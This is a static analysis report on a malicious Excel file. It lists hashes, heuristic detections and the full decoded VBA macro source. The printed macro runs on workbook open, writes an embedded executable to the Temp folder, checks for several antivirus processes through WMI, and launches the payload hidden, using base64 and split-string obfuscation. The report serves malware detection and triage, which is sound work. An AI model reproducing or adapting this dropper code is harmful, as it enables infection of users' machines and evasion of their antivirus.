Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f272a1f95930b707…

MALICIOUS

Office (OLE)

Size: 268.0 KB
Created: 2006-09-16 00:00:00
Authoring application: Microsoft Macintosh Excel
First seen: 2021-01-11
MD5: 4609c6d651320e8742e032d20d0d0590
SHA-1: 120bb2986ce98dc8f0401392edd3162c8a1792b1
SHA-256: f272a1f95930b707446fd597c6709a58befa2afcd287da0dc2abe31d222d6ca6
Risk score: 460

Heuristics (13)

  • VBA macros detected [medium] OLE_VBA_MACROS (10 related findings)
    Document contains VBA macro code
  • Potential Shell call in VBA [critical] OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
      Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64(laax), vbUnicode)) & StrConv(DecodeBase64("XDYuZXhl"), vbUnicode), vbHide
  • VBA WMI Win32_Process launcher [critical] OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
    Matched line in script
    Set wsh = VBA.CreateObject(UserForm1.TextBox1.Text & UserForm1.TextBox3.Text & UserForm3.TextBox3.Text)
  • VBA Base64-decoded Shell command stager [critical] OLE_VBA_BASE64_SHELL_COMMAND_STAGER
    VBA auto-exec macro decodes Base64 string literals into command or script-launch text and executes the result with Shell. This catches cmd/cscript/PowerShell/VBS launchers hidden from plain keyword matching.
    Matched line in script
    Set wsh = VBA.CreateObject(UserForm1.TextBox1.Text & UserForm1.TextBox3.Text & UserForm3.TextBox3.Text)
  • Dangerous API name reassembled from split string literals [critical] OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
    Matched line in script
    Set wsh = VBA.CreateObject(UserForm1.TextBox1.Text & UserForm1.TextBox3.Text & UserForm3.TextBox3.Text)
  • Embedded PE decoded from VBA/UserForm payload string [critical] OLE_VBA_EMBEDDED_PE_DROPPER
    The VBA macro carries a Windows executable encoded as a base64 or hex string — split across macro string literals, or stored in a UserForm control's text (e.g. TextBox1.Text) — and rebuilds it at run time, typically writing it to %ProgramData%/%TEMP% (ADODB.Stream / binary Put) and executing it via WScript.Shell or cmd.exe. The payload is embedded in the document, not downloaded, and never appears as a contiguous executable on disk, so the URL recoverers and the raw embedded-EXE scan miss it. The analyzer decoded it into a valid PE (MZ + DOS stub + PE header); a benign document does not carry an executable in its macro/form strings. The dropped payload has been carved for full extracted-file analysis.
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set wsh = VBA.CreateObject(UserForm1.TextBox1.Text & UserForm1.TextBox3.Text & UserForm3.TextBox3.Text)
  • GetObject call [high] OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
        Set objProcesses = GetObject("w" & "in" & "mg" & "mts" & ":{impersonationLevel=impersonate}!\\" & sComputer & "\root\cimv2").ExecQuery("SELECT * FROM Win32_Process WHERE Name = '" & sExeName & "'")
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro [low] OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
  • Environ() call (env variable access) [low] OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    ChDir Environ("T" & "e" & "m" & "p")
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://www.w3.org/1999/02/22-rdf-syntax-ns# (channel: in document text, OLE body)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 7333 bytes
SHA-256: dbfcda0ff3be89a13e00be7fec43282ab6ab53e000314fc8c97579d0fdcb1bd4
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "bbbb"
Sub killo()

Call closee

Application.DisplayAlerts = False
ActiveWorkbook.SaveAs ActiveWorkbook.FullName, FileFormat:=51

Application.Quit

End Sub


Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Private Sub Workbook_Open()
On Error Resume Next
ChDir Environ("T" & "e" & "m" & "p")
gdffs = Environ("T" & "e" & "m" & "p") & "\"


    Open gdffs & "6fsdFfa.com" For Output As #1
    Print #1, HexToString("4d5a" & UserForm7.TextBox1.Text)
    Close #1



Call cek


Call killo

End Sub

Public Function HexToString(ByVal HexToStr As String) As String

Dim strTemp   As String
Dim strReturn As String
Dim i As Long

For i = 1 To Len(HexToStr) Step 2
    strTemp = Chr$(Val("&H" & Mid$(HexToStr, i, 2)))
    strReturn = strReturn & strTemp
Next i
HexToString = Right(strReturn, Len(strReturn))
End Function


Attribute VB_Name = "UserForm7"
Attribute VB_Base = "0{C0A7B736-D3D1-4325-B4B8-12A99B88DA4A}{986D0647-B45D-433E-BE4E-D647DB9ECAEB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{12C65F98-D2AB-469E-BF06-C54EE42F5075}{237EA31E-AABA-47BA-9AB8-60E58816B9F2}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{6A182FF8-C52F-4171-96EF-FF890D54C052}{1BD435C8-13AF-463F-9EB2-93073FE9E586}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "nnnnnn"
Sub cek()

  Dim t As Date
    t = Now
    Do
        DoEvents
    Loop Until Now >= DateAdd("s", 3, t)
End Sub


Attribute VB_Name = "UserForm5"
Attribute VB_Base = "0{42E1A917-E9BC-45BD-9427-BF10C1A760AA}{4D562F9E-8A30-417F-816C-26119BE5AB18}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "vvvvvvv"
Sub closee()
Dim pl, kk, gdfsfsa
kk = ".com"


pl = kk


Dim lll, jgf, tyretw
Dim laax
laax = UserForm3.TextBox2.Text
jgf = StrConv(DecodeBase64("ZXhl"), vbUnicode)

lll = "6"

Dim jddsdfda As String


jddsdfda = UserForm5.TextBox1.Text
Dim yrtfdsad, vcxvxczcv
Dim mbbmbdf
Dim nuchevi
nuchevi = UserForm5.TextBox2.Text

Set wsh = VBA.CreateObject(UserForm1.TextBox1.Text & UserForm1.TextBox3.Text & UserForm3.TextBox3.Text)

 Dim lhjxvcvx
 lhjxvcvx = StrConv(DecodeBase64(UserForm3.TextBox1.Text), vbUnicode)

Dim kkkdds
kkkdds = StrConv(DecodeBase64("PGh" & "0bWw+DQo8" & "aGVhZD4NCiA8U0NSSVBUIExBTkdVQUdFPSJWQlNjcmlwdCI+DQogICAgICAgICAgV2luZG93Lk1vdmVUbyAtMzIwMDAsIC0zMjAwMA0KICAgICA8L1NDUklQVD4NCiAgICA8dGl0bGU+QXBwbGljYXRpb24gRXhlY3V0ZXI8L3RpdGxlPg0KICAgIDxIVEE6QVBQTElDQVRJT04gSUQ9Im9NeUFwcCIgDQogICAgICAgIEFQUExJQ0FUSU9OTkFNRT0iQXBwbGljYXRpb24gRXhlY3V0ZXIiIA0KICAgICAgICBCT1JERVI9Im5vIg0KICAgICAgICBDQVBUSU9OPSJubyINCiAgICAgICAgU0hPV0lOVEFTS0JBUj0ieWVzIg0KICAgICAgICBTSU5HTEVJTlNUQU5DRT0ieWVzIg0KICAgICAgICBTWVNNRU5VPSJ5ZXMiDQogICAgICAgIFNDUk9MTD0ibm8i"), vbUnicode)
 

If True = IsExeRunning(jddsdfda) Then
Open "1.hta" For Output As #1
  Print #1, kkkdds
  Print #1, lhjxvcvx
  Close #1
   
Name "6fsdFfa" & kk As lll & "." & jgf
wsh.Run "1.hta", 0, False
Exit Sub
   End If
   

   
    If True = IsExeRunning("PS" & "UAM" & "ain" & nuchevi) Then
Name "6fsdFfa" & kk As lll & "." & jgf


  Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64(laax), vbUnicode)) & StrConv(DecodeBase64("XDYuZXhl"), vbUnicode), vbHide

Exit Sub
   End If
   
      
   
       If True = IsExeRunning("n360" & nuchevi) Then
Name "6fsdFfa" & kk As lll & "." & jgf
Shell Environ(StrConv(DecodeBase64(laax), vbUnicode)) & StrConv(DecodeBase64("XDYuZXhl"), vbUnicode), vbHide


Exit Sub
   End If
If True = IsExeRunning("PccNT" & nuchevi) Then
Name "6fsdFfa" & kk As lll & "." & jgf
   Shell Environ(StrConv(DecodeBase64(laax), vbUnicode)) & StrConv(DecodeBase64("XDYuZXhl"), vbUnicode), vbHide

Exit Sub
   End If
   

 

   
If True = IsExeRunning("uiSeAgnt" & nuchevi) Then
Name "6fsdFfa" & kk As lll & "." & jgf
   Shell Environ(StrConv(DecodeBase64(laax), vbUnicode)) & StrConv(DecodeBase64("XDYuZXhl"), vbUnicode), vbHide

Exit Sub
   End If
   
     If True = IsExeRunning("mbam" & nuchevi) Then
     Open "1s.bat" For Output As #1
  Print #1, StrConv(DecodeBase64("cGluZyBsb2NhbGhvc3QgLW4gNjA="), vbUnicode), vbHide
  Print #1, StrConv(DecodeBase64("c3RhcnQgJXRlbXAlXDYucGlm"), vbUnicode), vbHide
  Close
   Name "6fsdFfa" & pl As "6" & ".pif"
     Shell "1s.bat", vbHide


Exit Sub
   End If
         If True = IsExeRunning("mbamtray" & nuchevi) Then
     Open "1s.bat" For Output As #1
  Print #1, StrConv(DecodeBase64("cGluZyBsb2NhbGhvc3QgLW4gNjA="), vbUnicode), vbHide
  Print #1, StrConv(DecodeBase64("c3RhcnQgJXRlbXAlXDYucGlm"), vbUnicode), vbHide
  Close
   Name "6fsdFfa" & pl As "6" & ".pif"
     Shell "1s.bat", vbHide

 
   

Exit Sub
   End If
Name "6fsdFfa" & pl As "6" & ".pif"


Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64(laax), vbUnicode)) & StrConv(DecodeBase64("X" & "DYuc" & "Glm"), vbUnicode), vbHide
  
End Sub

Sub fadf()





End Sub




Sub kklk()








End Sub


Private Function DecodeBase64(ByVal strData As String) As Byte()

 

    Dim objXML As MSXML2.DOMDocument
    Dim objNode As MSXML2.IXMLDOMElement
    

    Set objXML = New MSXML2.DOMDocument
    Set objNode = objXML.createElement("b64")
    objNode.DataType = "bin.base64"
    objNode.Text = strData
    DecodeBase64 = objNode.nodeTypedValue
    
    Set objNode = Nothing
    Set objXML = Nothing

 

End Function

Public Function IsExeRunning(sExeName As String, Optional sComputer As String = ".") As Boolean

    Dim objProcesses    As Object

    Set objProcesses = GetObject("w" & "in" & "mg" & "mts" & ":{impersonationLevel=impersonate}!\\" & sComputer & "\root\cimv2").ExecQuery("SELECT * FROM Win32_Process WHERE Name = '" & sExeName & "'")
    If objProcesses.Count <> 0 Then IsExeRunning = True


End Function
Filename: vba_embedded_payload.bin
Kind: vba-embedded-pe
Source: decoded from a hex/base64 payload string in a VBA UserForm control or macro literal
Size: 82359 bytes
SHA-256: 5f967f5e544e7b195d90f127d43d4285c07703c685cfcb74600684beaa7d4550